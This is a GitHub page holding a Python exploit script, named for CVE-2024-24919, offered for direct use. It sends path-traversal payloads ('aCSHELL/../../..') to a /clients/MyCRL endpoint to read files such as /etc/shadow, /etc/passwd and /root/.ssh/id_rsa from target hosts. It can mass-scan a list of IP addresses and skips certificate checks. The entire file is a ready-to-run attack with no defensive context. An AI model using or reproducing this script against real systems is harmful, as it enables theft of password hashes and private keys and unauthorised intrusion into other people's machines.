-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2024-24919.py
85 lines (76 loc) · 3.96 KB
/
CVE-2024-24919.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
import requests
def send_request(ip, port, path):
url = f"https://{ip}:{port}/clients/MyCRL"
data = path
try:
req = requests.post(url, data=data, verify=False)
if req.ok:
print(f"\033[92mO\033[0m Response from {ip} for {path}:\n", req.text) # Verde
else:
print(f"X Response from {ip} for {path}: Failed with status code {req.status_code}") # Rojo
except Exception as e:
print(f"X Error: Failed to connect to {ip} for {path}: {str(e)}") # Rojo
def read_ips_from_file(file_path):
with open(file_path, 'r') as file:
return [line.strip() for line in file if line.strip()]
def choose_path():
paths = {
'1': 'aCSHELL/../../../../../../../../../../../etc/passwd',
'2': 'aCSHELL/../../../../../../../../../../../etc/apache2/apache2.conf',
'3': 'aCSHELL/../../../../../../../../../../../etc/mysql/my.cnf',
'4': 'aCSHELL/../../../../../../../../../../../var/log/syslog',
'5': 'aCSHELL/../../../../../../../../../../../var/log/auth.log',
'6': 'aCSHELL/../../../../../../../../../../../etc/group',
'7': 'aCSHELL/../../../../../../../../../../../etc/shadow',
'8': 'aCSHELL/../../../../../../../../../../../root/.ssh/id_rsa',
'9': 'aCSHELL/../../../../../../../../../../../etc/hostname',
'10': 'aCSHELL/../../../../../../../../../../../etc/hosts',
'11': 'aCSHELL/../../../../../../../../../../../etc/resolv.conf',
'12': 'All of the above'
}
print("\nChoose the file you want to search:")
for key, value in paths.items():
print(f"{key}. {value}")
choice = input("Enter your choice: ")
if choice == '12':
return list(paths.values())[:-1]
return [paths.get(choice, None)]
def main():
logo = r"""
$$$$$$\ $$\ $$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\ $$\ $$\ $$$$$$\ $$\ $$\ $$$$$$\ $$\ $$$$$$\
$$ __$$\ $$ | $$ |$$ _____| $$ __$$\ $$$ __$$\ $$ __$$\ $$ | $$ | $$ __$$\ $$ | $$ |$$ __$$\ $$$$ | $$ __$$\
$$ / \__|$$ | $$ |$$ | \__/ $$ |$$$$\ $$ |\__/ $$ |$$ | $$ | \__/ $$ |$$ | $$ |$$ / $$ |\_$$ | $$ / $$ |
$$ | \$$\ $$ |$$$$$\ $$$$$$\ $$$$$$ |$$\$$\$$ | $$$$$$ |$$$$$$$$ |$$$$$$\ $$$$$$ |$$$$$$$$ |\$$$$$$$ | $$ | \$$$$$$$ |
$$ | \$$\$$ / $$ __|\______|$$ ____/ $$ \$$$$ |$$ ____/ \_____$$ |\______|$$ ____/ \_____$$ | \____$$ | $$ | \____$$ |
$$ | $$\ \$$$ / $$ | $$ | $$ |\$$$ |$$ | $$ | $$ | $$ |$$\ $$ | $$ | $$\ $$ |
\$$$$$$ | \$ / $$$$$$$$\ $$$$$$$$\ \$$$$$$ /$$$$$$$$\ $$ | $$$$$$$$\ $$ |\$$$$$$ |$$$$$$\\$$$$$$ |
\______/ \_/ \________| \________| \______/ \________| \__| \________| \__| \______/ \______|\______/
"""
print(logo)
print("https://github.com/skyrowalker\n")
while True:
source = input("Choose an option:\n1. Enter an IP address\n2. Use a file with IPs\n3. Exit\n")
if source == '1':
ip = input("Enter the IP address: ")
port = input("Enter the port: ")
paths = choose_path()
if paths:
for path in paths:
send_request(ip, port, path)
elif source == '2':
file_path = input("Enter the path to the file containing IPs: ")
port = input("Enter the port: ")
ips = read_ips_from_file(file_path)
paths = choose_path()
if paths:
for ip in ips:
for path in paths:
send_request(ip, port, path)
elif source == '3':
print("Exiting.../...!")
break
else:
print("Invalid option, please choose again.")
if __name__ == "__main__":
main()
1